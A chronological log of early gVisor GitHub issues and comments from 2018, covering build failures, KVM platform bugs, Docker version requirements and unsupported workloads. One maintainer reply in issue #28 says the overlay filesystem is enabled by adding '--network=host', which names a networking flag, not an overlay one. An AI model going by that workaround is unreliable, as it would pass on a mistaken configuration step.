[2018-04-26 21:45] nlacasse opened #1 "Nginx does not run"
Depending on the configuration, you may see `nginx` fail with the error:

[code]

Support for `FIOASYNC` is in progress, but it’s not available yet. For now, add
the line below to `/etc/nginx/nginx.conf`:

[code]

[2018-04-26 21:45] nlacasse opened #2 "ElasticSearch does not run"
This requires some socket ioctls that are not currently implemented.

[2018-04-26 21:46] nlacasse opened #3 "Postgres does not run"
Needs SysV shared memory support, which is not yet supported.

[2018-04-26 21:46] nlacasse opened #4 "Do real revalidation of "remote" file systems"
Re this item in the FAQ:

`DirentOperations` (akin to `dentry_operations` in Linux; embedded in `MountOperations`, which are about to be renamed `MountSourceOperations`, and are akin to `super_operations`) currently have `Revalidate` and `Keep` methods.

In Linux, revalidation will stat the inode to see if anything has changed. If it has, it re-walks to that node.

In gVisor, revalidation always r

[2018-05-02 06:12] iangudger opened #5 "First ping/UDP packet to destination fails with EHOSTDOWN"
The first ping or UDP packet sent to a destination will fail with EHOSTDOWN (host is down).

https://github.com/google/gvisor/blob/797cda301677abc8523d5a2a8d731312cc43bce4/pkg/tcpip/transport/ping/endpoint.go#L256-L264
https://github.com/google/gvisor/blob/797cda301677abc8523d5a2a8d731312cc43bce4/pkg/tcpip/transport/udp/endpoint.go#L289-L297

[2018-05-02 06:18] iangudger opened #6 "RAW sockets are not supported"
SOCK_RAW is not supported. Most ping implementations depend on it.

Ping sockets are supported, which are used by newer versions of ping. For example, Ubuntu 18.04 includes a sufficiently modern version of ping (make sure you are using the most recent version by running `docker pull ubuntu`).

[2018-05-02 14:01] adamierymenko opened #7 "Idea: host-OS-independence with alternate syscall interface"
I have an idea for this that builds on an idea I've had for a long time but have never had (and probably will not have) the time to implement.

The idea is to pseudo-virtualize Linux binaries by rebuilding them to call a function in user-space instead of executing CPU-level syscalls. This would require apps to be rebuilt from source, making it effectively a different "hardware architecture" (e.g.

[2018-05-02 14:31] vkobel opened #8 "bazel build requires python2"
When compiling with `bazel build runsc`, it assumes that the default python version is 2. When using version 3 one can expect error messages such as `bytes-like object is required, not 'str'` or `CRITICAL:root:VDSO contains relocations: b'\nThere are no relocations in this file.\n'`.

Changing default python version to python2 fixes this issue.

[2018-05-02 14:36] vkobel opened #9 "error: undefined reference to '__stack_chk_fail' at build"
When performing `bazel build runsc` under Arch the following error occurs: `error: undefined reference to '__stack_chk_fail'`.

One can fix this issue by adding `"-fno-stack-protector " +` in the cmd args in `vdso/BUILD` file (between -shared and -nostdlib).

EDIT: disabled stack protector instead of enabling it.

[2018-05-02 14:45] amscanne commented on #9
Thanks for the report!

What is the build environment? Since this doesn't happen for us, I'd like to make sure that it can be reproduced to fix it.

[2018-05-02 14:45] vkobel commented on #9
https://github.com/vkobel/gvisor/commit/84975669a6a4cbb92a8f4abf2430b70c61b10817

[2018-05-02 14:49] vkobel commented on #9
I'm using kernel `x86_64 Linux 4.14.36-1-MANJARO` and bazel 0.12.0

[2018-05-02 15:38] prattmic commented on #8
Oops. We'll make that script work in Python 2 or 3.

[2018-05-02 16:19] leonelwilliams opened #10 "Pre-built binaries?"
Nice project! Would it be possible to have pre-built binaries generated to decrease time needed to get up and running?

[2018-05-02 16:35] dmonay commented on #3
Is there a timeline or a public-facing roadmap of when this integration can be expected to be done? Thanks!

[2018-05-02 16:57] evanphx opened #11 "KVM platform doesn't seem to work"
First of all, what a cool project! I'm trying to use the kvm platform backend and running into an issue. I turned logging on and get the following:

[code]

The command run was `docker run --runtime=runsc hello-world`

Docker version: `Docker version 17.12.0-ce, build c97c6d6`

I guess it's trying to execute the hooks but the fs namespace has already been unbound?

[2018-05-02 17:38] nlacasse commented on #10
Thanks!  We're still working on a release plan for gVisor, but pre-built binaries will likely be part of that plan.

[2018-05-02 17:41] nlacasse commented on #3
It's on our roadmap, but we can't commit to any timeline yet.  Sorry.

[2018-05-02 17:42] prattmic commented on #11
Hi, thanks for trying out gVisor!

The KVM platform is still experimental and has some rough edges, as you've found. :)

I think there are actually two issues here:

1. Hooks aren't working correctly. This may be occurring regardless of platform. Can you try the ptrace platform and see if the hooks work correctly there? cc @fvoznika to take a look at hooks.

2. The sandbox is failing to initialize

[2018-05-02 17:48] fvoznika commented on #11
Thanks for reporting it! In addition to logs, please also post the docker command you have used.

[2018-05-02 17:49] q3k commented on #8
This is one build error that you get when building against python3:
[code]

Workaround is, of course, to make `python` in your `$PATH` point to a Python 2.7 interpreter.

[2018-05-02 18:00] qrpike opened #12 "Cgroups access?"
Does this runtime require cgroups to be enabled at the kernel level? I am trying to run containers on a linux build that has very little support for anything.

Thanks,

[2018-05-02 18:05] qrpike opened #13 "Issues Building"
I've tried it on macOS and linux, get the same response:

Linux:
[code]

macOS:
[code]

I have developer tools, xcode, etc installed.

[2018-05-02 18:06] fvoznika commented on #12
Right now, it doesn't use cgroups. Having said that, cgroup support is in our short term work list.

[2018-05-02 18:33] thomasjungblut opened #14 "support for nvidia-docker GPU container sandboxing"
In order to expose GPUs in K8s, you'll have to install nvidia-docker as an additional container runtime. A lot of people surely would love to run sandboxed containers with GPU support though.

Do you guys see an easy way to layer one over the other, maybe?

[2018-05-02 20:04] prattmic commented on #11
Thanks for logs, this looks similar to failures I've seen before. We'll look in it.

What CPU model is this running on? Could you paste one of the processor blocks from `/proc/cpuinfo`?

[2018-05-02 20:09] kofalt opened #15 "Update clone URL"
From the README:

[code]

Should this be updated to https://github.com/google/gvisor.git ?

[2018-05-02 20:13] evanphx commented on #11
Sure! It's a bit of an older machine running Ubuntu 16.04:

[code]

[2018-05-02 20:51] clandry94 commented on #2
Can't guarantee anything will come out of it but I can take a look into this

[2018-05-02 21:24] lotux opened #16 "build failed on Mac"
build failed on Mac

[code]

[code]

[2018-05-02 21:27] hugelgupf commented on #15
The official repo is at https://gvisor.googlesource.com/gvisor. GitHub is intended as a mirror and for issue tracking.

[2018-05-02 21:35] #15 closed

[2018-05-02 23:03] shibukawa commented on #16
I could work-around this issue by using gcc7. I use MacPorts. I don't know Homebrew way.

[code]

But I got another issue:

[code]

[2018-05-02 23:05] prattmic commented on #16
gVisor only supports Linux, I suppose our README should be more clear about that.

It might be possible to do cross-compilation builds of Linux outputs on OS X hosts, but it looks like you are trying to build for OS X directly.

[2018-05-03 00:14] jzeng4 opened #17 "how gVisor intercepts syscalls for container"
From the doc, gVisor intercept container syscall in host user space. I know Sysdig needs to install a kernel module for this purpose. Could you tell me more technical details for gVisor's syscall interceptions?

[2018-05-03 01:48] KnoooW opened #18 "based on ptrace SYSEMU ? only support x86 ?"
if gvisor is based on ptrace SYSEMU, does it mean you can only run x86 while not x86-64 bin inside the sandbox ??

[2018-05-03 01:52] KnoooW commented on #17
ptrace SYSEMU can do that job.

[2018-05-03 04:37] resouer commented on #14
@thomasjungblut If you are using latest Device Plugin + CRI based Kubernetes GPU support (e.g. 1.10), nvidia-docker should not be a dependency. So docker + gVisor or even cri-containerd + gVisor would be the solution.

Though it seems current gVisor sandbox does not work well with GPU devices (correct me if I'm wrong).

[2018-05-03 04:38] hugelgupf commented on #14
We don't expose access to GPUs at the moment. It's an open problem for us, too.

[2018-05-03 05:29] Chyroc commented on #16
Need a cross-platform compilation solution

[2018-05-03 06:41] wuqixuan opened #19 "docker give error when i use --runtime=runsc"
sudo docker run --runtime=runsc -it ubuntu:latest /bin/bash
docker: Error response from daemon: invalid character 'l' in literal false (expecting 'a').

[2018-05-03 06:44] alveko opened #20 "Memory layout and vulnerability to side-channel attacks"
Q1: Is the memory layout of the guest same as if it runs directly on the host kernel? Specifically, if the underlying host kernel maps all physical memory to virtual address space of each process (the way which made Meltdown possible), will it preserve such mapping in the gVisor container?

Q2: Assuming the underlying host kernel and CPU is vulnerable side-channel attacks (same as or similar to Me

[2018-05-03 06:50] wuqixuan opened #21 "docker run --runtime=runsc hello-world failed"
I can run hello-world with runc, but runsc failed.

$sudo docker run --runtime=runsc hello-world
error reading spec: error unmarshaling spec from file "/var/run/docker/libcontainerd/bab9e5f444815a1a612eef51c2637d146ec84bb5ed882310d8909b4b0e900f3a/config.json": json: cannot unmarshal array into Go struct field Process.capabilities of type specs.LinuxCapabilities
 {"ociVersion":"1.0.0-rc2-dev","plat

[2018-05-03 06:53] littleq0903 commented on #7
it would be like what WSL does in Windows.

[2018-05-03 07:04] hugelgupf commented on #7
If you ported gVisor to other OS', i.e. came up with a kvm-like platforms using an OS X / Windows / whatever hypervisor, and moved some Linux-specific bits in the sentry around, you wouldn't even need to modify the binaries you want to run.

You could have to rebuild if you want to skip the hypervisor/syscall-interception-platform and move only the Linux-specific bits around. But that's kind of a

[2018-05-03 08:41] #8 closed

[2018-05-03 08:56] fvoznika commented on #19
Please, follow [these instruction](https://github.com/google/gvisor#debugging) and attach the logs in /tmp/runsc. What version of docker are you running?

[2018-05-03 08:58] fvoznika commented on #21
What Docker version are you using?

[2018-05-03 09:10] fvoznika commented on #2
That would be great! Here are some pointers:

Follow [these instructions](https://github.com/google/gvisor#debugging) to enable strace and run elasticsearch. Look for the log file: `runsc.log.*.boot` -- this represents the log for the Sentry process. The log will have a dump of all syscalls, look for ioctl calls that have failed: `ioctl.*error`.

The entry point for the the ioctl syscall in the Se

[2018-05-03 09:25] #18 closed

[2018-05-03 09:25] dhaavi commented on #9
I am experiencing the same error:

[code]
System:
Linux 4.16.3-1-ARCH (Antergos)

Bazel:
[code]

I can supply additional information if needed.

I can also confirm that the patch by @vkobel solves the issue.

[2018-05-03 09:56] llitfkitfk opened #22 "pkg/sentry/kernel/futex/futex.go:95:10: undefined: waiterList"

[2018-05-03 10:15] #22 closed

[2018-05-03 10:31] llitfkitfk opened #23 "Failed to build in docker container centos:7"
[code]

[2018-05-03 10:34] llitfkitfk commented on #23
[root@c3f456871892 gvisor]# bazel build runsc
INFO: Analysed target //runsc:runsc (0 packages loaded).
INFO: Found 1 target...
ERROR: /root/.cache/bazel/_bazel_root/8efa14feb181cf4b8ae1b0ddb1bac0e9/external/com_google_protobuf/BUILD:64:1: undeclared inclusion(s) in rule '@com_google_protobuf//:protobuf_lite':
this rule is missing dependency declarations for the following files included by 'externa

[2018-05-03 12:10] gedw99 commented on #16
@prattmic  Update the Readme .. I was also tripped up by this.

[2018-05-03 15:15] vkobel commented on #9
I made an AUR package for those interested: https://aur.archlinux.org/packages/gvisor-git/
Currently it's based on my forked repo, but I'll change it as soon as this google repo is fixed.

[2018-05-03 16:06] raravena80 opened #24 "Failed to start hello world on Ubuntu 16.04"
[code]

[2018-05-03 16:14] iwankgb opened #25 "Memory mapping error on KVM platform"
Command:
[code]

Output (truncated, ignoring other goroutines):
[code]

Start log seems to report issue similar to that reported in #11:
[code]

Content of `/etc/docker/daemon.json`:
[code]

`/proc/cpuinfo` (truncated):
[code]

[2018-05-03 17:34] richardweinberger opened #26 "collect2: fatal error: cannot find 'ld'"
On Linux the build fails:

$ bazel build --verbose_failures runsc
INFO: Analysed target //runsc:runsc (0 packages loaded).
INFO: Found 1 target...
ERROR: /home/rw/homerw_old/work/gvisor/vdso/BUILD:8:1: Executing genrule //vdso:vdso failed (Exit 1): bash failed: error executing command
  (cd /home/rw/.cache/bazel/_bazel_rw/5842f54b5499609ce9d6a4a0b7803cf7/execroot/__main__ && \
  exec env - \
    P

[2018-05-03 17:48] hugelgupf commented on #26
What distro are you on?

You may have to install the gold linker, e.g.

[code]

on Ubuntu.

[2018-05-03 17:52] richardweinberger commented on #26
Installing gold did the trick, thanks!
I'm on OpenSUSE Leap.

[2018-05-03 17:52] #26 closed

[2018-05-03 20:40] ijc opened #27 "Missing netstack license"
Many files under `pkg/` have a header:
[code]

However there is no `LICENSE` file (nor any similarly named files) in those subdirectories and the top-level `LICENSE` has an Apache 2.0 license.

I think you need to include a copy of https://github.com/google/netstack/blob/master/LICENSE?

[2018-05-03 20:42] hugelgupf commented on #27
@nlacasse weren't we going to relicense Netstack to be Apache, as well?

[2018-05-03 21:59] nlacasse commented on #24
What version of docker are you running?  We require 17.09.0 or greater.

[2018-05-03 22:07] nlacasse commented on #16
Sorry for the confusion.  Readme has been updated.

[2018-05-03 22:07] #16 closed

[2018-05-03 23:26] kroppt opened #28 "groupadd fails: lock file already used"
Testing takes like 2 seconds:
- `docker run --runtime=runsc -it ubuntu /bin/bash`
- `root@123456abcdefg:/# test`
- Returns with the following:
[code]

Nothing seems to show up in the logs when trying with debugging. I confirmed that this is happening both with and without KVM, and only with gVisor.

[2018-05-03 23:42] prattmic commented on #9
@vkobel could you verify that `-fno-stack-protector` also works? This VDSO shouldn't be using stack protectors at all. (As your build error shows, there is no where to go if there is a problem).

[2018-05-04 00:33] loveharmful commented on #23
I had the same issue, running `env CC=/usr/bin/gcc bazel build runsc` allowed the build to complete. (via https://github.com/tensorflow/tensorflow/issues/14380#issuecomment-362787829)

[2018-05-04 02:53] dreampuf commented on #23
I wrote some instructions for the build.
https://gist.github.com/dreampuf/6446936e84dc5c965ec947fb4080b032

[2018-05-04 02:56] clandry94 commented on #2
Note: the elasticsearch image was failing to start due to not being able to find a loopback interface even though `lo` was present in the network interface list.

This is probably an error unrelated to this issue and adding `--network=host` to the docker runtime args got me to the point where an ioctl error occurs.

[2018-05-04 03:06] llitfkitfk commented on #23
Success to build

@dreampuf Thanks👍

[2018-05-04 03:06] #23 closed

[2018-05-04 04:32] #12 closed

[2018-05-04 04:45] fvoznika commented on #28
Hmm, I can run it just fine. Can you please follow the steps [here](https://github.com/google/gvisor#debugging) and attach the logs to the bug?

[2018-05-04 04:54] reggi opened #29 "Install failure"
[code]

[2018-05-04 04:55] reggi commented on #29
The first build:

[code]

[2018-05-04 05:02] iangudger commented on #29
It is not currently possible to build gVisor on macOS. gVisor currently only supports Linux. See #13 and #16.

[2018-05-04 05:47] raravena80 commented on #24
I'm using 17.03. That's the base for k8s now I believe btw.

[code]

[2018-05-04 05:52] vrothberg commented on #24
Kubernetes doesn't do a very good job in this regard as all versions of Docker used in the e2e tests are EOL already. If you want to try gvisor, Docker-CE 17.09.X works well in our K8S deployments.

[2018-05-04 05:52] nlacasse commented on #24
gVisor requires features that only exist in Docker 17.09.0 and up.

[2018-05-04 05:52] #24 closed

[2018-05-04 06:14] zhangbo1882 opened #30 "can gvisor be used for rkt container?"
Rkt is another well known container engine. Is there a plan to support run rkt on gvisor ?

[2018-05-04 06:15] fvoznika commented on #30
We currently have no plans to support it.

[2018-05-04 06:15] #30 closed

[2018-05-04 07:01] #29 closed

[2018-05-04 07:25] vrothberg opened #31 "Rethinking how runsc is built"
Currently, the entire build system depends on Bazel. Although Bazel entails many advantages, it renders the project to be nearly impossible to build in certain environments. I have been working on creating a package for openSUSE since yesterday, tried different versions of Bazel to pre-fetch all dependencies into a cache, but all attempts failed. It seems there is no way to cache all dependencies

[2018-05-04 07:46] vkobel commented on #9
@prattmic yes, it does work with `-fno-stack-protector`. I've update my fork and the arch package.
My original attempt was with this option, but I didn't assume VDSO to require no stack protectors.

[2018-05-04 09:58] liron-l opened #32 "docker returns additional bad error messages when binary is not found"
[code]
produces:
[code]
[code]

Docker daemon logs:
[code]

runc error code:
[code]

[2018-05-04 10:47] rogpeppe commented on #31
FWIW I tried to use bazel (installed with the instructions [here](https://docs.bazel.build/versions/master/install-ubuntu.html)) and it fails with this error:

    % bazel build runsc
    Couldn't find java at '/usr/lib/jvm/java-6-sun/bin/java'.

I think it would be great if at all possible that gvisor was buildable with the standard go tool.

At the least, it would be nice if source files could b

[2018-05-04 11:53] chanwit opened #33 "Failed to run portainer"
When running Portainer (`portainer/portainer`) with volume binding, the container cannot be started.

- `docker version` or `docker info` if more relevant
Docker 18.03.1

- `uname -a`
[code]
- Full docker command you ran
`docker run -p 9000:9000 --privileged -v /var/run/docker.sock:/var/run/docker.sock portainer/portainer`

Error log from Docker daemon:
[code]

Log files:
[runsc.log.20180504-11361

[2018-05-04 14:08] amscanne commented on #31
Thanks for the reports.

Re: java failure, it seems like your java installation might be broken. (Maybe an environment or alternatives issue?) I agree that the grouping should probably be fixed.

I'm afraid I'm not familiar with the OpenSUSE build environment. Is this build.opensuse.org? I'm looking into this now. I want to understand the issue fully before any drastic considerations.

[2018-05-04 14:38] vrothberg commented on #31
@amscanne That's correct. The core problem with bazel is that it fetches dependencies at build-time. I tried playing around with pre-fetching them using a cache and re-using that cache in the RPM build, but it doesn't seem to work as bazel will still miss some dependencies.

What would we optimal is to have all dependencies in `./vendor` directory and to specify which libraries are additionally re

[2018-05-04 15:08] rogpeppe commented on #31
FWIW I'm pretty sure I have a working java installation (I can run the "java" command fine), but no binary at /usr/lib/jvm/java-6-sun/bin/java ([this](http://paste.ubuntu.com/p/ZdVtSt3sGY/) is the listing of my /usr/lib/jvm directory).

It would be nice if I didn't need to debug java installation issues to try to build a Go tool.

[2018-05-04 17:17] fvoznika commented on #33
Part of this is fixed with commit 5376cd4 (typo and missing capability).

The other part is what you're trying to do is incompatible with the sandbox model. `--privileged` option is to give the container access to the host machine and mapping of unix domain socket inside the sandbox is explicitly prohibited to keep the isolation.

[2018-05-04 17:28] hugelgupf commented on #31
You're right, and the Go parts are definitely possible to build with vendoring. But keep in mind we also have the VDSO in C++ - which has to be built and included in the Go binary: https://github.com/google/gvisor/blob/master/vdso/BUILD

[2018-05-04 17:40] iangudger commented on #31
There is also all of the generated Go code. The Go toolchain doesn't handle that very well. I believe that is part of the reason that Kubernetes is transitioning to Bazel.

[2018-05-04 20:15] #9 closed

[2018-05-04 20:21] davidedelvento opened #34 "Invite to gvisor developers at the (HPC) SEA conference 2019"
Folks,

Sorry for reaching out via the issue tracker, that's the best way I can think of on a Friday PM regarding how to reach you. By the way, your project looks really interesting. Feel free to close this issue and contact me by email in reply: https://staff.ucar.edu/users/ddvento

---

You may have heard of [The first containers in HPC Symposium at the SEA conference 2018](https://sea.ucar.edu/

[2018-05-04 21:14] iwankgb commented on #25
@prattmic not always, apparetnly. Every dozen or so I can see following error:
[code]
Same erorr can be found in start log:
[code]

[2018-05-04 21:27] iwankgb commented on #25
I also managed to get following error 2 or 3 times:
[code]
You can find all 10 log files generated during this run at: https://critical.today/files/newstack.tar.bz2.

[2018-05-04 21:29] iwankgb commented on #25
I also managed to run the container succussfully (twice out of ~50 attempts). See logs at https://critical.today/files/successfull.tar.bz2.

[2018-05-04 23:06] prattmic commented on #25
That error is the same as #11, so it looks like these are related. Let's merge the two issues.

Duplicate of #11

[2018-05-04 23:06] prattmic commented on #25
Duplicate of #11

[2018-05-04 23:07] prattmic commented on #11
iwankgb has provided more logs in #25.

[2018-05-04 23:16] iwankgb commented on #11
I gave it another try on another device:
[code]

Now getting following error in majority (4 out of 5) of cases (detailed logs available at: https://critical.today/files/create_failed_atom.tar.gz):
[code]

In 1 out of 5 cases I was getting address space conflict error (detailed logs available at: https://critical.today/files/address_space_atom.tar.gz)

[2018-05-04 23:33] wuqixuan commented on #19
Thank you very much, i used the latest docker, it's working.

[2018-05-04 23:33] #19 closed

[2018-05-04 23:34] wuqixuan commented on #21
Thank you very much, i use the latest docker, then it's working.

[2018-05-04 23:34] #21 closed

[2018-05-05 04:01] hugelgupf opened #35 "Support AppArmor profiles?"
Twitter conversation context:

Supporting AppArmor profiles doesn't actually seem that hard:

- runc does it at this step in the process: https://github.com/opencontainers/runc/blob/69663f0bd4b60df09991c08812a60108003fa340/libcontainer/standard_init_linux.go#L95
- applying an apparmor profile is just writing the name of the profile you want applied to a proc file: https://github.com/opencontainers

[2018-05-05 04:03] hugelgupf commented on #35
To be completely clear, this would be a profile applied to the sandbox, not to the application inside the sandbox.

[2018-05-05 04:04] hugelgupf commented on #35
Which leaves open the question of -- when you specify an AppArmor profile to docker on the cmdline, do you expect that to be applied to the container/sandbox <-> process boundary or the container/sandbox <-> kernel boundary? I don't know if the spec even considers that or specifies it.

[2018-05-05 06:07] iangudger commented on #35
What do you mean by external attacks? Protecting the sandbox from other processes on the host? Hardening the sandboxed app?

[2018-05-05 06:12] kroppt commented on #28
I mistyped the testing command; it should be `groupadd test` or whatever other group name.
[code]

I had done testing before, such that there existed the log files, but even then I noticed that nothing would show up when testing this issue.

[2018-05-05 07:08] kspviswa opened #36 "Query : How gVisor is different from Unikernels?"
I would like to understand how gVisor is different from Unikernels / Microkernels?

[2018-05-05 07:34] fvoznika commented on #36
Please send questions to: gvisor-users@googlegroups.com

[2018-05-05 07:34] #36 closed

[2018-05-05 07:35] kspviswa commented on #36
thanks..

[2018-05-05 07:39] fvoznika commented on #34
Thanks for the invitation. You can send the survey to my username @google.com and I'll redirect to the rest of the team.

In the future, please use gvisor-users@googlegroups.com.

[2018-05-05 07:39] #34 closed

[2018-05-05 08:42] bluecmd commented on #31
@vrothberg @rogpeppe Have you raised these concerns with the Bazel team? It seems to me like bugs/valid feature requests, and fixing it there would help everyone that is using Bazel.

[2018-05-05 08:44] chanwit commented on #33
Thank you @fvoznika. I'll try another option, like connecting to the target Docker engine via TCP.
It may raise another issue, but I'll try to address them one-by-one. I'll back to you shortly with some more updates.

[2018-05-05 08:45] bluecmd commented on #7
Isn't the point of gVisor to secure untrusted workloads though? If so, that is stopping the unknown software from embedding syscalls and not play nice?

[2018-05-05 11:05] ianmiell opened #37 "OCI runtime exec error: flag provided but not defined: -console-socket"
[code]

[code]

[code]

Code to repro:

https://github.com/ianmiell/shutit-gvisor/blob/master/build.py

[2018-05-05 13:41] mangokingTW opened #38 "runsc will crash after a SIGINT signal"
Hello guys,
I find an interesting behavior of gVisor.
When I ran a docker in ```docker run --runtime=runsc -it ubuntu /bin/bash```,
it crashed by following steps:
[code]
This problem is not occurred at anytime but frequently.

OS: CentOS 7
docker version: 18.03.1-ce
kernel version: Linux  4.16.7-1.el7.elrepo.x86_64 x86_64 x86_64 x86_64 GNU/Linux

[2018-05-05 15:12] chanwit commented on #33
I compiled a new binary from today's commit, and narrowed the test case.

1. run `docker run --runtime=runsc -p 9000:9000 portainer/portainer --no-auth --no-analytics -H tcp://127.0.0.1:2375`
2. do `curl http://127.0.0.1:9000/js/app.bb4cea25.js > js`.
This URL is a large minified JS file. It seems there are somethings at the network layer prevented it from being fully read.
I ran curl many times,

[2018-05-05 16:29] iangudger commented on #33
@chanwit, Can you upload some new logs?

[2018-05-05 21:31] hugelgupf commented on #35
Right, that much we discussed on twitter, and obviously it doesn't make sense _for gVisor_ to apply an AppArmor profile inside the sandbox. I'm asking the question from [comment 2](https://github.com/google/gvisor/issues/35#issuecomment-386777220) from an API perspective.

When you specify `--security-opt apparmor=foo`, what does a user expect? They probably expect that applications that don't fit

[2018-05-06 05:58] chanwit commented on #33
@iangudger please file the logs below.

[runsc.log.20180506-125421.107544.create.txt](https://github.com/google/gvisor/files/1977373/runsc.log.20180506-125421.107544.create.txt)
[runsc.log.20180506-125421.113868.gofer.txt](https://github.com/google/gvisor/files/1977374/runsc.log.20180506-125421.113868.gofer.txt)
[runsc.log.20180506-125421.114533.boot.txt](https://github.com/google/gvisor/files/197

[2018-05-06 07:55] vrothberg commented on #31
@bluecmd, not yet. I first wanted to raise the issue here, which is likely to be a blocker for a wider adoption of gvisor on many Linux distributions. Some of Bazel's options just left the experimental stage with v0.13.0, so I assume that support for it is still at an early stage.

[2018-05-06 13:10] dlorenc commented on #33
@fvoznika can you clarify whether or not volume mounts are expected to work with gvisor?

[2018-05-07 05:40] chanwit opened #39 "Feature request: runsc --version"
Need a kind of version number, probably in the form of git commit.
This would be great when reporting bugs back to the project.

[2018-05-07 07:49] qq843700497 commented on #19
I0507 15:36:32.406081   74991 x:0] ***************************
I0507 15:36:32.406174   74991 x:0] Args: [/root/go/src/gvisor/bazel-bin/runsc/linux_amd64_pure_stripped/runsc --debug-log-dir=/tmp/runsc --debug --strace --root /var/run/docker/runtime-runsc/moby --log /run/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/e93c939184a4b9a7f949e878fdc391b605663b90c7eba84d6b7d1ca9aeaef46d/log.

[2018-05-07 19:26] amscanne commented on #11
I think the common thread here is that the physical address size on these CPUs is only 36 bits. (The Core is pretty old, and it seems newer Atoms support VT-x but still have a small physical address size?) We'll have to constrain the virtual hole punching or at least provide a better error here.

[2018-05-07 20:02] adamierymenko commented on #7
@hugelgupf Yes that could work, but the thought I had was to make it possible to run Linux environments anywhere with no elevated permissions.

[2018-05-07 20:44] davidstanke commented on #31
Hey folks! Bazel team here. Thanks for the feedback -- we'd love to understand your needs better and see how we might be able to help. I encourage you to raise issues in github.com/bazelbuild/bazel (or .../rules_go if that's appropriate), and I'd also be happy to hop on a call some time to talk through stuff. Just contact me at davidstanke [at] google [dot] com if you'd like to set up a chat.

[2018-05-08 07:34] vrothberg commented on #31
Hi @davidstanke, thanks for checking! I opened an issue for Bazel (see https://github.com/bazelbuild/bazel/issues/5175).

Thanks! Let's see how the discussion kicks-off in the Bazel issue. In case we cannot resolve the issue, setting up a call sounds great, thanks.

[2018-05-08 12:44] Ace-Tang commented on #37
I got the same error message
[code]

[2018-05-08 14:59] chanwit commented on #39
@hugelgupf @fvoznika I'm about to submit patch to Gerrit. Am I allowed to do so? Already registered there by username at gmail dot com.

[2018-05-08 15:00] chanwit commented on #39
CLA is signed.

[2018-05-08 15:15] hugelgupf commented on #39
Go for it.

[2018-05-08 15:37] chanwit commented on #39
@hugelgupf never mind. Done by tweaking `.git/config`.

Here's the changes:
https://gvisor-review.googlesource.com/c/gvisor/+/2020

[2018-05-08 17:34] #35 closed

[2018-05-08 21:15] ultimoguerrero commented on #11
I'm having issues related to KVM as well too.

[code]
[code]
VM info:
[code]
Host system is Fedora Core 28 running Virt-Manager 1.5.1

CPU Info
[code]
Any suggestions?

[2018-05-09 00:09] flx42 commented on #14
We have an OCI prestart hook here: https://github.com/NVIDIA/nvidia-container-runtime/tree/master/hook
It leverages [libnvidia-container](https://github.com/NVIDIA/libnvidia-container). But of course that's probably not sufficient, depending on the actual capabilities/blocked syscalls at runtime.

[2018-05-09 02:55] qifcheng opened #40 "kurento start failed"
I replaced the runtime with runsc, and try to start offical kurento media server, but it failed with follow logs output:
root@node23:/test# docker logs 5a9b7c5b1f1a
+ set -e
+ '[' -n '' ']'
+ '[' -n '' -a -n '' ']'
+ cat /etc/hosts
+ sed /::1/d
+ tee /etc/hosts
tee: /etc/hosts: Invalid argument

my docker environment:
root@node23:/test# docker version
Client:
 Version:	17.12.1-ce
 API version:	1.3

[2018-05-09 03:00] qifcheng commented on #40
This is my start command:
docker run --name kms -p 8888:8888 -d kurento/kurento-media-server

root@node23:/test# docker info | grep Runtime
Runtimes: runc runsc
Default Runtime: runsc
WARNING: No swap limit support

with debugging flag opened:
{
    "default-runtime": "runsc",
    "runtimes": {
        "runsc": {
            "path": "/usr/local/bin/runsc",
            "runtimeArgs": [

[2018-05-09 03:05] qifcheng opened #41 "zookeeper start failed"
I start the zookeeper container with the dockerhub official image, but it turns out repeated again and again.
root@node23:/test# docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                            PORTS               NAMES
5348d914acd1        zookeeper           "/docker-entrypoint.…"   2 minutes ago       Restarting (127) 19 seconds ago

[2018-05-09 09:05] KnoooW opened #42 "how gvisor trap to syscall handler using vmx"
Hello all,
 Just curious about the tech details on how gvisor trap to syscall handler using vmx,
it grateful if you can also figure the source  code file and functions which finishing such tasks.

Thanks !

by the way, I ask the question couple days ago in google group, but nobody answer it.
so i post it here.

[2018-05-09 16:40] fvoznika commented on #28
This is happening because we're not tracking inode link count correctly, so groupadd thinks that it failed to acquire the lock file. If you need a workaround for now, you can enable overlay which will properly account for links. To use it, add `--network=host` to `runtimeArgs` section of your configuration.

This flag will enable an overlay filesystem inside the sandbox. This further isolates the

[2018-05-09 17:10] #25 closed

[2018-05-09 21:13] #32 closed

[2018-05-09 22:44] #28 closed

[2018-05-10 01:41] Ace-Tang commented on #37
thanks for your reply, @fvoznika

[2018-05-10 10:45] warpfork commented on #10
I'd like to offer a slightly more verbose form of +1 to this...

Even if the release plan isn't fully finalized, a (totally non-final, throws warnings everywhere, etc) binary release would still have a ton of value for me as a reference for early evaluation.  For example, I'm interested in getting an order of magnitude (4MB or 40 or 400?) estimate of just plain how big the binaries are -- this wil

[2018-05-10 16:32] prattmic commented on #10
FWIW:

[code]

[code]

[code]

[2018-05-10 19:38] #40 closed

[2018-05-10 20:27] nlacasse commented on #10
We now have nightly builds.  You can find the latest here:
https://storage.googleapis.com/gvisor/releases/nightly/latest/runsc

I'll be updating the instructions on the README soon.

[2018-05-10 20:27] #10 closed

[2018-05-10 23:59] nlacasse commented on #39
The git revision is now displayed in the debug block at the beginning of the output.

[2018-05-10 23:59] #39 closed

[2018-05-11 10:47] chanwit commented on #33
@fvoznika @iangudger could you give some hints where should I start to take a look to find cause of this issue?

[2018-05-11 16:16] chanwit commented on #33
Tested with and without  `--network=host`, results are the same.

[2018-05-11 17:16] fvoznika commented on #33
@dlorenc, yes volume mounts work with gVisor.

@chanwit, sorry I haven't had a chance to look into this yet. I was able to repro it locally though.

[2018-05-11 20:33] fvoznika commented on #41
The loader is not following RPATHs when running under gVisor for some reason. You can workaround this for now by instructing the loader to look under the Java's directory. Create the following file and map it to `/etc/ld-musl-x86_64.path` inside the container using `-v` option:
[code]
Then run:
`docker run -d --runtime=runsc -v /tmp/ld-musl-x86_64.path:/etc/ld-musl-x86_64.path zookeeper`

[2018-05-12 06:06] iwankgb commented on #11
I will next week.

sob., 12 maj 2018, 01:23 użytkownik Adin Scannell <notifications@github.com>
napisał:

--
Pozdrawiam/Regards,
Maciej Iwanowski.

[2018-05-12 07:43] chanwit commented on #33
@fvoznika thank you. Glad to know that you could reproduce it.

[2018-05-13 14:04] Aunworapat opened #43 "Google calender"
Before filling an issue, please consult our FAQ: https://github.com/google/gvisor#faq--known-issues
Also check that the issue hasn't been reported before.

If you have a question, please email gvisor-users@googlegroups.com rather than filing a bug.

